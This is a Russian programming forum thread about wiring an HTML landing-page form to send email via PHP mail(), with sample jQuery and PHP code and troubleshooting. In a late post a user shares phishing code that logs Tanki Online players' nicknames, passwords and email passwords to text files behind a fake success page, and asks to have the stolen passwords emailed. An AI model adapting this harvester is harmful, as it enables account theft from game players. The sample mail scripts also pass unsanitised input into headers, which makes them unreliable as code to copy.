Форум программистов, компьютерный форум, киберфорум
HTML, CSS
Войти
Регистрация
Восстановить пароль
Карта форума Темы раздела Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.85/177: Рейтинг темы: голосов - 177, средняя оценка - 4.85
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
1

Настройка формы отправки на почту

06.06.2014, 17:07. Показов 33965. Ответов 17
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Тут попросили сделать landing page, но не в тему вёрстки добавили - необходимо настроить форму отправки на почту, этому можно где то быстро научиться или от куда то скрипт скопировать?
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
06.06.2014, 17:07
Ответы с готовыми решениями:

mezzanine настройка отправки заказа на почту
Есть интернет магазин. Сделан на mezzanine (что-то из питоновского). Его перенесли на другой...

Формы отправки на почту, когда их много
Я делаю для каждой формы отдельный скрипт отправки, чувствую что делаю тупо, можно ли как то...

Php для отправки формы на почту
напишите плиз код с пояснениями пример надо пользователю заполнить форму: 1.выбрать шкаф (радио...

Скрипт для отправки данных из формы на почту
Здравствуйте, подскажите пожалуйста новичку скрипт для отправки данных из формы на почту...

17
Человек
330 / 204 / 63
Регистрация: 04.02.2013
Сообщений: 1,220
06.06.2014, 17:47 2
Могут быть ошибки

HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<!doctype html>
<head>
<script src="http://yandex.st/jquery/1.9.1/jquery.js"></script>
<script>
function send_form() { 
var msg = $("#forma").serialize();
$.ajax({
type: "POST",
url: "/send_form.php",
data: msg,
success: function(data) {
alert("Сообщение отправлено");
setTimeout(function () {
$(".feedback_form_bg").fadeOut();}, 1000);
},
error:  function(xhr, str){
alert("Возникла ошибка!");
setTimeout(function () {$(".feedback_form_bg").fadeOut();}, 1000);
}
});
}
</script>
 
</head>
<body>
 
<form method="post" action="javascript:void(0);" onsubmit="send_form();" id="forma">
<input type="text" name="fio" placeholder="Ф.И.О" />
<input type="text" name="phone" placeholder="Телефон" />
<input type="text" name="email" placeholder="E-Mail" />
<input type="text" name="adres" placeholder="Адрес доставки" />
<br/>
<input type="submit" value="отправить" />
</form> 
 
</body>
</html>
PHP
1
2
3
4
5
6
7
8
9
$fio= $_POST['fio'];
$phone= $_POST['phone'];
$email= $_POST['email'];
$adres= $_POST['adres'];
$emailTo = 'mail@mail.ru'; //Сюда введите Ваш email
$body = "$fio \n\n$phone\n\n$email \n\n$adres";
$headers = "Content-Type: text/plain; charset=utf-8\r\n".'From: MySite <'.$emailTo.'>' . "\r\n" . 'Reply-To: ' . $emailTo;
mail($emailTo, $fio, $body, $headers);
$emailSent = true;
2
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
06.06.2014, 18:31  [ТС] 3
Т.е. я вот этот id #forma даю полю для емэйла и заказчик лэндинга мне говорит спасибо за настройку отправки или ещё какие то манипуляции требуются? Вижу айдишник в скрипте, но не вижу куда эмэйл вводить, на который будут вся эта информация приходить? В общем я не очень понимаю смысл по большому счёту, как я понял в эту форму человек вводит данные, жмёт на кнопку - эта инфа приходит к "закачику" и это всё верстальщик как то настроить должен в html.
0
43 / 43 / 25
Регистрация: 21.07.2013
Сообщений: 357
06.06.2014, 19:01 4
Для верстальщика тут еже много работы потому что совершенно нет СSS стилей...форму надо как-то украсить. Тут представлен голый функционал
0
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
06.06.2014, 19:21  [ТС] 5
Меня только функционал и интересует.
0
4 / 4 / 0
Регистрация: 21.02.2013
Сообщений: 91
07.06.2014, 02:54 6
Вот без JavaScript как можно реализовать:
HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<form action="handler.php" method="post" id="reply">
                        <fieldset>  
                            <div class="legend">Написать письмо</div>
                            <div class="form_row">
                                <div class="form_property form_required">
                                    <label for="name"> Ваше имя </label>
                                </div>
                                <div class="form_value">
                                    <input type="text" size="32" name="name" value="" class="text" id="name" />
                                </div>
                                <div class="clearer">&nbsp;</div>
                            </div>
                            <div class="form_row">
                                <div class="form_property">
                                    <label for="email">Ваш email</label>
                                </div>
                                <div class="form_value">
                                    <input type="text" size="32" name="email" value="" class="text" id="email" />
                                </div>
                                <div class="clearer">&nbsp;</div>
                            </div>
                            <div class="form_row">
                                <div class="form_property form_required">
                                    <label for="comment">Сообщение</label>
                                </div>
                                <div class="form_value">
                                    <textarea rows="10" cols="46" name="text" id="comment"></textarea>
                                </div>
                                <div class="clearer">&nbsp;</div>
                            </div>
                            <div class="form_row form_row_submit">
                                <div class="form_value">
                                    <input type="submit" class="button" value="Отправить »" />
                                </div>
                                <div class="clearer">&nbsp;</div>
                            </div>
                        </fieldset>
                    </form>
файл handler.php:
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
                    /**
                *isset() - проверяет на наличие переменной/значения (равно NULL или нет)
                *empty() - проверяет переменную на пустоту. Обращаю внимание, 0 - для нее тоже пустота!
                    **/
if( isset($_POST['name'],$_POST['email'],$_POST['text']) ) {
 $name = trim($_POST['name']); #убираем пробелы по краям, если они есть
 $email = trim($_POST['email']); #убираем пробелы по краям, если они есть
 $text = trim($_POST['text']); #убираем пробелы по краям, если они есть
  if(empty($name) || empty($email) || empty($text)) { //если что то не ввели
   echo 'Вы заполнили не все поля!';
  }
  else { //все поля заполнены, отправляем
   $mailto = 'ваш@mail.ru, ваш_еще_один@mail.ru';
   $subject = 'Сообщение с сайта';
//формируем текст сообщения
   $message  = 'Сообщение от пользователя <b>'.$name.'</b><br />';
   $message .= 'E-mail пользователя: <a href="mailto:' . $email . '">' . $email . '</a><br />';
   $message .= 'Текст сообщения:<br />' . $text;
//формируем заголовки (кодировку только, остальное сами добавите по желанию)
   $headers = 'Content-type: text/html; charset=windows-1251';
//отправляем письмо
   $mail = mail($mailto, $subject, $message, $headers);
//проверяем отправку
    if(TRUE === $mail) echo '<h2>Ваше сообщение успешно отправлено!</h2>';
    else echo '<h2>Произошла ошибка при отправке сообщения.</h2>';
//проверку можно записать короче при помощи тернарного оператора, вот так:
//  echo (TRUE === $mail) ? 'Ваше сообщение успешно отправлено!' : 'Произошла ошибка при отправке сообщения.' ;
//тогда нужно будет раскомментировать строчку выше и закомментировать строчки выше с проверкой
  }
}
?>
0
Человек
330 / 204 / 63
Регистрация: 04.02.2013
Сообщений: 1,220
09.06.2014, 12:49 7
Mailo, я вам привел php код который отвечает а отправку сообщения

PHP
1
2
3
4
5
6
7
8
9
$fio= $_POST['fio'];
$phone= $_POST['phone'];
$email= $_POST['email'];
$adres= $_POST['adres'];
$emailTo = 'mail@mail.ru'; //Сюда введите Ваш email
$body = "$fio \n\n$phone\n\n$email \n\n$adres";
$headers = "Content-Type: text/plain; charset=utf-8\r\n".'From: MySite <'.$emailTo.'>' . "\r\n" . 'Reply-To: ' . $emailTo;
mail($emailTo, $fio, $body, $headers);
$emailSent = true;
тут даже комментарий присутствует куда почту вставлять
PHP
1
$emailTo = 'mail@mail.ru'; //Сюда введите Ваш email
1
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
09.06.2014, 18:05  [ТС] 8
Не заметил первый раз кода PHP, спасибо.

Добавлено через 8 минут
А кстати - попробовал не работает, выдаёт ошибку - Площадка

Мой код (емэй свой вставил)
HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<!doctype html>
<head>
<script src="http://yandex.st/jquery/1.9.1/jquery.js"></script>
<script>
function send_form() { 
var msg = $("#forma").serialize();
$.ajax({
type: "POST",
url: "/send_form.php",
data: msg,
success: function(data) {
alert("Сообщение отправлено");
setTimeout(function () {
$(".feedback_form_bg").fadeOut();}, 1000);
},
error:  function(xhr, str){
alert("Возникла ошибка!");
setTimeout(function () {$(".feedback_form_bg").fadeOut();}, 1000);
}
});
}
</script>
 
</head>
<body>
 
<form method="post" action="javascript:void(0);" onsubmit="send_form();" id="forma">
<input type="text" name="fio" placeholder="Ф.И.О" />
<input type="text" name="phone" placeholder="Телефон" />
<input type="text" name="email" placeholder="E-Mail" />
<input type="text" name="adres" placeholder="Адрес доставки" />
<br/>
<input type="submit" value="отправить" />
</form> 
 
</body>
</html>
PHP
1
2
3
4
5
6
7
8
9
$fio= $_POST['fio'];
$phone= $_POST['phone'];
$email= $_POST['email'];
$adres= $_POST['adres'];
$emailTo = 'zz441766@gmail.com';
$body = "$fio \n\n$phone\n\n$email \n\n$adres";
$headers = "Content-Type: text/plain; charset=utf-8\r\n".'From: MySite <'.$emailTo.'>' . "\r\n" . 'Reply-To: ' . $emailTo;
mail($emailTo, $fio, $body, $headers);
$emailSent = true;
0
Человек
330 / 204 / 63
Регистрация: 04.02.2013
Сообщений: 1,220
09.06.2014, 18:11 9
Тут смотрите

Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<script>
function send_form() { 
var msg = $("#forma").serialize();
$.ajax({
type: "POST",
url: "/send_form.php",
data: msg,
success: function(data) {
alert("Сообщение отправлено");
setTimeout(function () {
$(".feedback_form_bg").fadeOut();}, 1000);
},
error:  function(xhr, str){
alert("Возникла ошибка!");
setTimeout(function () {$(".feedback_form_bg").fadeOut();}, 1000);
}
});
}
</script>
url: "/send_form.php", расположение php скрипта
0
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
09.06.2014, 20:18  [ТС] 10
Изменил путь, слеш был лишним, теперь пишет : "Сообщение отправлено", но на почту ничего не приходит.
0
Человек
330 / 204 / 63
Регистрация: 04.02.2013
Сообщений: 1,220
09.06.2014, 22:41 11
код рабочий, на своих проектах использую.
Обратитесь к хостеру, или смотрите логи.
1
11 / 11 / 13
Регистрация: 25.04.2012
Сообщений: 1,157
09.06.2014, 23:59 12
Mailo, в спаме письмо посмотрите
0
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
10.06.2014, 02:51  [ТС] 13
В спаме нету, наверно что то я не дописал или для гугл почты не работает. Может и веб сервер как то по особому должен быть настроен, хостера нету, хосчу у себя на компе.
0
Человек
330 / 204 / 63
Регистрация: 04.02.2013
Сообщений: 1,220
10.06.2014, 09:51 14
Mailo, веб сервер готовая сборка, или сами все компоненты настраивали ?
0
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
10.06.2014, 17:21  [ТС] 15
Apachi, готовая сборка, отключал только дефолтную кодировку.
0
228 / 208 / 27
Регистрация: 18.02.2010
Сообщений: 2,043
19.06.2014, 02:25  [ТС] 16
Дело было в моём компе, а может и в роутере, на ноут дефолтный апачи ставил, тоже не прокатило, заказал хостинг - там всё без вопросов отправилось.
0
0 / 0 / 0
Регистрация: 19.01.2015
Сообщений: 2
19.01.2015, 18:41 17
Всем привет, вот у меня есть такой код типо со сниффера который крадёт пароли, только есть проблемка... Все пароли сохраняются в файлики ТХТ которые находятся вместе со всеми, и мне так не очень удобно, по этому помогите)) нужно сделать так чтобы эти все пароли приходили на почту вот код - <?php
file_put_contents("accouunts.txt",$_POST["Nickname"].':'.$_POST["Password"]."\n",FILE_APPEND);
header('Location: /test.php?user='.$_POST["Nickname"]);
?> - и еще проблемка, они по отдельности, получается это на Лог. И пароль, и есть еще на мейл вот - ?php
file_put_contents("email.txt",$_POST["login"]." - ".$_POST["email"].':'.$_POST["email_pass"]."\n",FILE_APPEND);
?>
<meta http-equiv="Refresh" content="1; URL=http://tankionline.com/battle-ru.html#/server=RU30&battle=fffffffad532a1a0">
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="icon" type="image/ico" href="/favicon.ico" />
<link href="style.css" media="screen" rel="stylesheet" type="text/css">
<body>
<title>Tanki Online</title>
<br>
<br>
<center>
<div id="forma" class="form" >
<table width="300">
<br>
<br>
<br>
</tbody></table>
<div class="thisComment" id="Comment">Успех!</div>
<br>
<br>
<br>
</td></tr>
</tbody></table>
</div>
</div>
</form>
</body>
</html>
0
Человек
330 / 204 / 63
Регистрация: 04.02.2013
Сообщений: 1,220
19.01.2015, 18:43 18
Отдельную тему создайте, и используйте форматирование текста.
0
19.01.2015, 18:43
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
19.01.2015, 18:43
Помогаю со студенческими работами здесь

Скрипт для отправки данных из формы на почту
Доброго времени суток.Первый раз пробую прикрутить форму для отправки данных на мэил и столкнулся с...

Скрипт для формы отправки сообщений на почту
Сделал форму отправки сообщений через Ajax. Форма работает, отправляет, проблема в том, что если...

Функционирование формы отправки заявки на почту для сайта
В интернете много разных таких форм, но многие не работают другие не понятны, можете помочь с...

Php для отправки email формы на мою почту
&lt;div id=&quot;mc_embed_signup&quot; class=&quot;lefts&quot;&gt; ...

Скрипт отправки нескольких файлов из формы с сайта на почту
Как изменить скрипт, чтобы он отправлял несколько выбранных файлов из формы сайта на почту? Есть...

Как составить условие для формы отправки письма на почту!
Добрый день! Как составить условие для формы отправки письма на почту?! Мой код абсолютно рабочий,...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
18
Ответ Создать тему
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru